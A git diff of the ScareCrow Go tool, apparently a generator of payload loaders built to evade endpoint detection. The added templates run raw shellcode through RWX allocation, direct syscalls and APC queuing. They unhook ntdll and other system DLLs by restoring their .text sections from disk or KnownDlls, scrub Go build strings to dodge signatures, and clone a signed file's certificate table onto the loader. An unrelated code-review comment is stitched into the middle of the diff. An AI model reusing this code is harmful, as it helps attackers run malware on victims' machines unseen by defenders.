{{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} + var {{.Variables.alloctype}}, {{.Variables.protect}} uintptr + var {{.Variables.oldptrperms}} uintptr + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) + {{.Variables.protect}} = 0x40 + {{.Variables.alloctype}} = 0x3000 + {{.Variables.ptr}}, _, _ := {{.Variables.VirtualAlloc}}.Call(0, uintptr(len({{.Variables.raw_bin}})), {{.Variables.alloctype}}, {{.Variables.protect}}) + + {{.Variables.RtlCopyMemoryMessage}} + {{.Variables.RtlCopyMemory}}.Call({{.Variables.ptr}}, (uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}}[0])), uintptr(len({{.Variables.raw_bin}}))) + {{.Variables.VirtualProtectMessage}} + + + + [loader].[NtProtectVirtualMemoryprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldptrperms}}, + ) + {{.Variables.SyscallMessage}} + syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0) } - {{.Variables.handle}} := {{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr +` +} + +func Syscall_NtQueueAPCThreadEx_Local() string { + return ` + const ( + QUEUE_USER_APC_FLAGS_NONE = iota + QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC + QUEUE_USER_APC_FLGAS_MAX_VALUE + ) + - {{.Variables.WriteProcessMemory}}({{.Variables.handlez}}, uintptr({{.Variables.dllOffset}}), (&{{.Variables.bytes}}[0]), uintptr(uint32(len({{.Variables.bytes}}))), & 
{{.Variables.oldfartcodeperms}}) + func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ - return nil + {{.Variables.kernel32}} := windows.NewLazySystemDLL("kernel32.dll") + {{.Variables.ntdll}} := windows.NewLazySystemDLL("ntdll.dll") + {{.Variables.RtlCopyMemory}} := {{.Variables.ntdll}}.NewProc("RtlCopyMemory") + {{.Variables.NtQueueApcThreadEx}} := {{.Variables.ntdll}}.NewProc("NtQueueApcThreadEx") + {{.Variables.GetCurrentThread}} := {{.Variables.kernel32}}.NewProc("GetCurrentThread") + + var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr + var {{.Variables.phandle}} uint64 + var {{.Variables.oldptrperms}} uintptr + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.phandle}} = 0xffffffffffffffff + {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) + {{.Variables.protect}} = 0x40 + {{.Variables.alloctype}} = 0x3000 + {{.Variables.AllocatingMessage}} + {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, uintptr({{.Variables.regionsize}}), {{.Variables.alloctype}}, {{.Variables.protect}}, 0) + {{.Variables.RtlCopyMemoryMessage}} + {{.Variables.RtlCopyMemory}}.Call({{.Variables.ptr}}, (uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}}[0])), uintptr(len({{.Variables.raw_bin}}))) + {{.Variables.VirtualProtectMessage}} + [loader].[NtProtectVirtualMemoryprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldptrperms}}, + ) + {{.Variables.GetCurrentThreadMessage}} + {{.Variables.thread}}, _, _ := {{.Variables.GetCurrentThread}}.Call() + {{.Variables.NtQueueApcThreadExMessage}} + {{.Variables.NtQueueApcThreadEx}}.Call({{.Variables.thread}}, QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, uintptr({{.Variables.ptr}}), 0, 0, 0) + + } +` +} + +func Disk_Refresh() string { + return ` + 
func {{.Variables.Reloading}} error { + {{.Variables.DLLname}} := []string{string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), + string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), + string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'}), + string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})} + + for i, _ := range {{.Variables.DLLname}} { + {{.Variables.ReloadingMessage}} + {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}[i]) + if {{.Variables.error}} != nil { + return {{.Variables.error}} + } + {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}[i]) + if {{.Variables.error}} != nil { + return {{.Variables.error}} + } + {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) + {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] + {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}[i]) + if {{.Variables.error}} != nil { + return {{.Variables.error}} + } + {{.Variables.handle}} := {{.Variables.loaddll}}.Handle + {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) + {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) + {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) + {{.Variables.handlez}} := uintptr(0xffffffffffffffff) + var {{.Variables.oldfartcodeperms}} uintptr + {{.Variables.Address}} := {{.Variables.FindAddress}}() + + {{.Variables.runfunc}}, _ := 
[loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.Address}}, + {{.Variables.handlez}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x40, + &{{.Variables.oldfartcodeperms}}, + ) + if {{.Variables.runfunc}} != 0 { + } + for i := 0; i < len({{.Variables.bytes}}); i++ { + {{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i)) + {{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}})) + (*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i] + } + {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.Address}}, + {{.Variables.handlez}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldfartcodeperms}}, + ) + } + return nil + } + + + ` } + +func KnownDLL_Refresh() string { + return ` + var {{.Variables.NtOpenSection}} uint16 + var {{.Variables.NtMapViewOfSection}} uint16 + var {{.Variables.mxKeSFQASvbvx}} uint16 + func {{.Variables.Reloading}} { + {{.Variables.DLLname}} := []string{string([]byte{'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'}), + string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), + string([]byte{'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), + string([]byte{'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})} + + for i, _ := range {{.Variables.DLLname}} { + KnownDLL({{.Variables.DLLname}}[i]) + } + } + + var procNtOpenSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtOpenSection") + var procNtMapViewOfSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtMapViewOfSection") + var procNtUnmapViewOfSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtUnmapViewOfSection") + + type sstring struct { + PWstr *uint16 + } + func (s sstring) String() string { + return windows.UTF16PtrToString(s.PWstr) + } + func KnownDLL({{.Variables.DLL}} string) []byte { + 
{{.Variables.ReloadingMessage}} + var {{.Variables.KnownDll}} , {{.Variables.sztViewSize}} , {{.Variables.CleanSystemDLL}} uintptr + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.ntPathW}} := "\\" + string([]byte{'K', 'n', 'o', 'w', 'n', 'D', 'l', 'l', 's'}) + "\\" + {{.Variables.DLL}} + {{.Variables.ntPath}}, _ := windows.NewNTUnicodeString({{.Variables.ntPathW}}) + {{.Variables.objectAttributes}} := windows.OBJECT_ATTRIBUTES{} + {{.Variables.objectAttributes}}.Attributes = 0x00000040 + {{.Variables.objectAttributes}}.ObjectName = {{.Variables.ntPath}} + {{.Variables.objectAttributes}}.Length = uint32(unsafe.Sizeof(windows.OBJECT_ATTRIBUTES{})) + {{.Variables.Address}} := {{.Variables.FindAddress}}() + {{.Variables.NtOpenSection}} = 0x37 + {{.Variables.ttttt}} := 0x0004 + r, _ := [loader].[NtOpenSectionprep]( + {{.Variables.NtOpenSection}}, + {{.Variables.Address}}, + uintptr(unsafe.Pointer(&{{.Variables.KnownDll}})), + uintptr({{.Variables.ttttt}}), + uintptr(unsafe.Pointer(&{{.Variables.objectAttributes}})), + ) + if r != 0 { + } + {{.Variables.NtMapViewOfSection}} = 0x28 + zero := 0 + one := 1 + [loader].[NtOpenSection]( + {{.Variables.NtMapViewOfSection}}, + {{.Variables.Address}}, + {{.Variables.KnownDll}}, + {{.Variables.handle}}, + uintptr(unsafe.Pointer(&{{.Variables.CleanSystemDLL}})), + uintptr(zero), + uintptr(zero), + uintptr(zero), + uintptr(unsafe.Pointer(&{{.Variables.sztViewSize}})), + uintptr(one), + uintptr(zero), + uintptr(syscall.PAGE_READONLY), + ) + {{.Variables.rawdata}} := rawreader.New({{.Variables.CleanSystemDLL}}, int({{.Variables.sztViewSize}})) + {{.Variables.file}}, _ := pe.NewFileFromMemory({{.Variables.rawdata}}) + {{.Variables.fullbytes}}, err := {{.Variables.file}}.Bytes() + if err != nil { + } + {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) + {{.Variables.bytes}} := {{.Variables.fullbytes}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] + {{.Variables.filee}}, error 
:= filepe.Open(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\'}) + {{.Variables.DLL}} ) + if error != nil { + } + {{.Variables.xx}} := {{.Variables.filee}}.Section(".text") + {{.Variables.loaddlll}}, error := windows.LoadDLL(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\'}) + {{.Variables.DLL}} ) + if error != nil { + } + {{.Variables.ddhandlez}} := {{.Variables.loaddlll}}.Handle + {{.Variables.dllBase}} := uintptr({{.Variables.ddhandlez}}) + {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.xx}}.VirtualAddress) + {{.Variables.mxKeSFQASvbvx}} = 0x50 + {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) + var {{.Variables.oldfartcodeperms}} uintptr + + {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.mxKeSFQASvbvx}}, + {{.Variables.Address}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x40, + &{{.Variables.oldfartcodeperms}}, + ) + if {{.Variables.runfunc}} != 0 { + } + {{.Variables.WriteMemoryfunc}}({{.Variables.bytes}}, uintptr({{.Variables.dllOffset}})) + {{.Variables.filee}}.Close() + {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.mxKeSFQASvbvx}}, + {{.Variables.Address}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldfartcodeperms}}, + ) + if {{.Variables.runfunc}} != 0 { + } + syscall.Syscall(uintptr(procNtUnmapViewOfSection.Addr()), 2, uintptr({{.Variables.handle}}), {{.Variables.CleanSystemDLL}}, 0) + return {{.Variables.bytes}} + } + + + func {{.Variables.WriteMemoryfunc}}({{.Variables.inbuf}} []byte, {{.Variables.destination}} uintptr) { + for {{.Variables.index}} := uint32(0); {{.Variables.index}} < uint32(len({{.Variables.inbuf}})); 
{{.Variables.index}}++ { + {{.Variables.writePtr}} := unsafe.Pointer({{.Variables.destination}} + uintptr({{.Variables.index}})) + {{.Variables.v}} := (*byte)({{.Variables.writePtr}}) + *{{.Variables.v}} = {{.Variables.inbuf}}[{{.Variables.index}}] + } + } + ` } diff --git a/Utils/Utils.go b/Utils/Utils.go index 4f80b88..b68618f 100644 --- a/Utils/Utils.go +++ b/Utils/Utils.go @@ -24,16 +24,19 @@ func Version() { Version := runtime.Version() Version = strings.Replace(Version, "go1.", "", -1) VerNumb, _ := strconv.ParseFloat(Version, 64) - if VerNumb >= 16.1 { + if VerNumb >= 19.1 { } else { - log.Fatal("Error: The version of Go is to old, please update to version 1.16.1 or later") + log.Fatal("Error: The version of Go is to old, please update to version 1.19.1 or later") } } -func ModuleObfuscator(name string, FuncName string) { +func ModuleObfuscator(name string, FuncName string, encryptionmode string) { NTVirProt := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) NTVirProtpre := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) Alloc := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + NtOpenSectionprep := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + NtOpenSection := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + NtProtectVirtualMemoryJMPprep := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) sysid := Cryptor.VarNumberLength(10, 19) processHandle := Cryptor.VarNumberLength(10, 19) 
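Review bot: The raised version gate in `Version()` still parses the runtime version as a float, so a plain `go1.19` toolchain becomes 19 and is rejected as below 19.1 even though the message says 1.19.1 is enough, and any string `ParseFloat` cannot read (prerelease or devel builds) silently becomes 0 because the error is discarded. The check also keeps its work in an empty-bodied `if` with the `log.Fatal` in the `else`, and the message reads "to old". I would check the parse error, invert the condition and fix the wording as below; if 1.19.1 specifically is the floor, the minor component should be compared separately rather than through a float, since `19.10` and `19.1` parse to the same value. `Version`'s signature sits outside the hunk and is shown only for placement.
```go
func Version() {
	Version := strings.TrimPrefix(runtime.Version(), "go1.")
	VerNumb, err := strconv.ParseFloat(Version, 64)
	if err != nil || VerNumb < 19 {
		log.Fatalf("Error: the version of Go (%s) is too old or unrecognised, please update to version 1.19 or later", runtime.Version())
	}
}
```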
@@ -42,11 +45,45 @@ func ModuleObfuscator(name string, FuncName string) { NewProtect := Cryptor.VarNumberLength(10, 19) oldprotect := Cryptor.VarNumberLength(10, 19) loader := Cryptor.VarNumberLength(10, 19) + + syscallA := Cryptor.VarNumberLength(10, 19) + KnownDll := Cryptor.VarNumberLength(10, 19) + ttttt := Cryptor.VarNumberLength(10, 19) + objectAttributes := Cryptor.VarNumberLength(10, 19) + name = name + ".go" + if encryptionmode == "ELZMA" { + PackageEditor("loader/loader.go", "[io_import]", `"io"`) + PackageEditor("loader/loader.go", "[bytes_import]", `"bytes"`) + PackageEditor("loader/loader.go", "[log_import]", `"log"`) + PackageEditor("loader/loader.go", "[ELZMA]", `"github.com/ulikunitz/xz"`) + PackageEditor("loader/loader.go", "[cipher_import]", ``) + PackageEditor("loader/loader.go", "[aes_import]", ``) + } + if encryptionmode == "AES" { + PackageEditor("loader/loader.go", "[cipher_import]", `"crypto/cipher"`) + PackageEditor("loader/loader.go", "[aes_import]", `"crypto/aes"`) + PackageEditor("loader/loader.go", "[io_import]", ``) + PackageEditor("loader/loader.go", "[bytes_import]", ``) + PackageEditor("loader/loader.go", "[log_import]", ``) + PackageEditor("loader/loader.go", "[ELZMA]", ``) + } + if encryptionmode == "RC4" { + PackageEditor("loader/loader.go", "[cipher_import]", `"crypto/rc4"`) + PackageEditor("loader/loader.go", "[aes_import]", ``) + PackageEditor("loader/loader.go", "[io_import]", ``) + PackageEditor("loader/loader.go", "[bytes_import]", ``) + PackageEditor("loader/loader.go", "[log_import]", ``) + PackageEditor("loader/loader.go", "[ELZMA]", ``) + } + PackageEditor("loader/loader.go", "[NtProtectVirtualMemoryprep]", NTVirProtpre) - PackageEditor(name, "[NtProtectVirtualMemoryprep]", NTVirProtpre) + PackageEditor("loader/loader.go", "[NtProtectVirtualMemoryJMPprep]", NtProtectVirtualMemoryJMPprep) PackageEditor("loader/loader.go", "NtProtectVirtualMemory", NTVirProt) PackageEditor("loader/loader.go", "Allocate", Alloc) + 
PackageEditor("loader/loader.go", "[NtOpenSectionprep]", NtOpenSectionprep) + PackageEditor("loader/loader.go", "NtOpenSection", NtOpenSection) + PackageEditor("loader/loader.go", "loader", loader) PackageEditor("loader/loader.go", "FuncName", FuncName) @@ -56,12 +93,22 @@ func ModuleObfuscator(name string, FuncName string) { PackageEditor("loader/loader.go", "[regionSize]", regionSize) PackageEditor("loader/loader.go", "[NewProtect]", NewProtect) PackageEditor("loader/loader.go", "[oldprotect]", oldprotect) + PackageEditor("loader/loader.go", "[syscallA]", syscallA) + PackageEditor("loader/loader.go", "[KnownDll]", KnownDll) + PackageEditor("loader/loader.go", "[ttttt]", ttttt) + PackageEditor("loader/loader.go", "[objectAttributes]", objectAttributes) PackageEditor("loader/asm.s", "NtProtectVirtualMemory", NTVirProt) PackageEditor("loader/asm.s", "Allocate", Alloc) + PackageEditor("loader/asm.s", "NtOpenSection", NtOpenSection) PackageEditor(name, "[loader]", loader) PackageEditor(name, "[NtProtectVirtualMemory]", NTVirProt) PackageEditor(name, "[Allocate]", Alloc) + PackageEditor(name, "[NtProtectVirtualMemoryJMPprep]", NtProtectVirtualMemoryJMPprep) + PackageEditor(name, "[NtProtectVirtualMemoryprep]", NTVirProtpre) + PackageEditor(name, "[NtOpenSection]", NtOpenSection) + PackageEditor(name, "[NtOpenSectionprep]", NtOpenSectionprep) + PackageEditor("go.mod", "loader", loader) os.Rename("loader/loader.go", "loader/"+loader+".go") os.Rename("loader", loader) 
@@ -104,6 +151,36 @@ func CheckGarble() { } } +func GoEditor(name string) { + buff, err := ioutil.ReadFile(name) + if err != nil { + log.Fatalf("Error: %s", err) + } + gostringg1 := "to unallocated span37252902984619140625Arabic Standard TimeAzores Standard" + gostringg2 := "TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsEtwReplyNotificationGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorIsrael Standard TimeJordan Standard TimeMeroitic_Hieroglyphs" + gostringg3 := "Standard Timebad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid request" + gostringg4 := "codeinvalid write resultis a named type filekey has been revokedmalloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.Value.SetIntreflect.makeFuncStubruntime: double waitruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header of unexported method previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceEastern Standard" + gostringg5 := "0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memory" + gostringg6 := "buildinf:" + gostringg7 := " Go build ID:" + gostringg8 := "gogo" + gostringg9 := "goid" + gostringg10 := "go.buildid" + gostringg11 := 
"_cgo_dummy_export" + gostringg12 := "glob" + gostringg13 := "fatal error: cgo callback before cgo cal" + stringnum := []string{gostringg1, gostringg2, gostringg3, gostringg4, gostringg5, gostringg6, gostringg7, gostringg8, gostringg9, gostringg10, gostringg11, gostringg12, gostringg13} + + mydata := string(buff) + for i := range stringnum { + val := Cryptor.RandStringBytes(len(stringnum[i])) + mydata = strings.ReplaceAll(string(mydata), stringnum[i], val) + } + + ioutil.WriteFile(name, []byte(mydata), 0777) + +} + func Sha256(input string) { f, err := os.Open(input) if err != nil { @@ -223,8 +300,7 @@ func Unzip(src string, dest string) ([]string, error) { func B64decode(name string) { var base64string string if name == "loader.zip" { - base64string = "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" - + base64string = "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" } if name == "icons.zip" { base64string = "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" diff --git a/go.mod b/go.mod index 7fbc71a..f2ef878 100644 --- a/go.mod +++ b/go.mod @@ -1,15 +1,17 @@ module ScareCrow -go 1.17 +go 1.19 require ( + github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee github.com/fatih/color v1.13.0 github.com/josephspurrier/goversioninfo v1.4.0 ) require ( github.com/akavel/rsrc v0.10.2 // indirect - github.com/mattn/go-colorable v0.1.12 // indirect + github.com/mattn/go-colorable v0.1.9 // indirect github.com/mattn/go-isatty v0.0.14 // indirect - golang.org/x/sys v0.0.0-20220412015802-83041a38b14a // indirect + github.com/ulikunitz/xz v0.5.11 // indirect + golang.org/x/sys v0.3.0 // indirect ) diff --git a/go.sum b/go.sum index e31cf42..c857912 100644 --- a/go.sum +++ b/go.sum 
@@ -1,3 +1,5 @@
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee h1:neBp9wDYVY4Uu1gGlrL+IL4JeZslz+hGEAjBXGAPWak=
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=
 github.com/akavel/rsrc v0.10.2 h1:Zxm8V5eI1hW4gGaYsJQUhxpjkENuG91ki8B4zCrvEsw=
 github.com/akavel/rsrc v0.10.2/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c=
 github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=
@@ -6,9 +8,8 @@ github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w=
 github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk=
 github.com/josephspurrier/goversioninfo v1.4.0 h1:Puhl12NSHUSALHSuzYwPYQkqa2E1+7SrtAPJorKK0C8=
 github.com/josephspurrier/goversioninfo v1.4.0/go.mod h1:JWzv5rKQr+MmW+LvM412ToT/IkYDZjaclF2pKDss8IY=
+github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U=
 github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc=
-github.com/mattn/go-colorable v0.1.12 h1:jF+Du6AlPIjs2BiUiQlKOX0rt3SujHxPnksPKZbaA40=
-github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4=
 github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
 github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y=
 github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94=
@@ -17,12 +18,14 @@ github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZN
 github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
 github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0=
 github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/ulikunitz/xz v0.5.11 h1:kpFauv27b6ynzBNT/Xy+1k+fK4WswhN/6PN5WhFAGw8=
+github.com/ulikunitz/xz v0.5.11/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14=
 golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I=
 golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
-golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
-golang.org/x/sys v0.0.0-20220412015802-83041a38b14a h1:MjZauhfFyuA8jS6CGa4rO215DgesKDIEzMSQ6mm8wW8=
-golang.org/x/sys v0.0.0-20220412015802-83041a38b14a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.3.0 h1:w8ZOecv6NaNa/zC8944JTU3vz4u6Lagfk4RPQxv92NQ=
+golang.org/x/sys v0.3.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
 gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
 gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/limelighter/limelighter.go b/limelighter/limelighter.go
index 7855f71..d075c0c 100644
--- a/limelighter/limelighter.go
+++ b/limelighter/limelighter.go
@@ -18,6 +18,7 @@ import ( "strings" "time" + "github.com/Binject/debug/pe" "github.com/josephspurrier/goversioninfo" ) @@ -152,6 +153,34 @@ func SignExecutable(password string, pfx string, filein string, fileout string) } } +func Cloner(CompiledLoader, FiletoClone string) { + Clonefile, err := ioutil.ReadFile(CompiledLoader) + if err != nil { + log.Fatalf("Error: %s", err) + } + LoaderFile, err := ioutil.ReadFile(CompiledLoader) + if err != nil { + log.Fatalf("Error: %s", err) + } + signedFileReader := bytes.NewReader(Clonefile) + signedPEFile, err := pe.NewFile(signedFileReader) + if err != nil { + + } + + targetFileReader := bytes.NewReader(LoaderFile) + targetPEFile, err := pe.NewFile(targetFileReader) + if err != nil { + + } + + targetPEFile.CertificateTable = signedPEFile.CertificateTable + Data, err := targetPEFile.Bytes() + if err != nil { + } + ioutil.WriteFile(CompiledLoader, Data, 0777) +} + func FileProperties(name string, configFile string) string { fmt.Println("[*] Creating an Embedded Resource File") vi := &goversioninfo.VersionInfo{} @@ -175,7 +204,6 @@ func FileProperties(name string, configFile string) string { name = vi.StringFileInfo.InternalName } else if configFile == "" { if name == "APMon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "APMon.dll.mui" vi.StringFileInfo.FileDescription = "Adaptive Port Monitor" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -193,7 +221,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "APMon.dll.mui" } if name == "bisr" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "bisrv.dll.mui" vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 
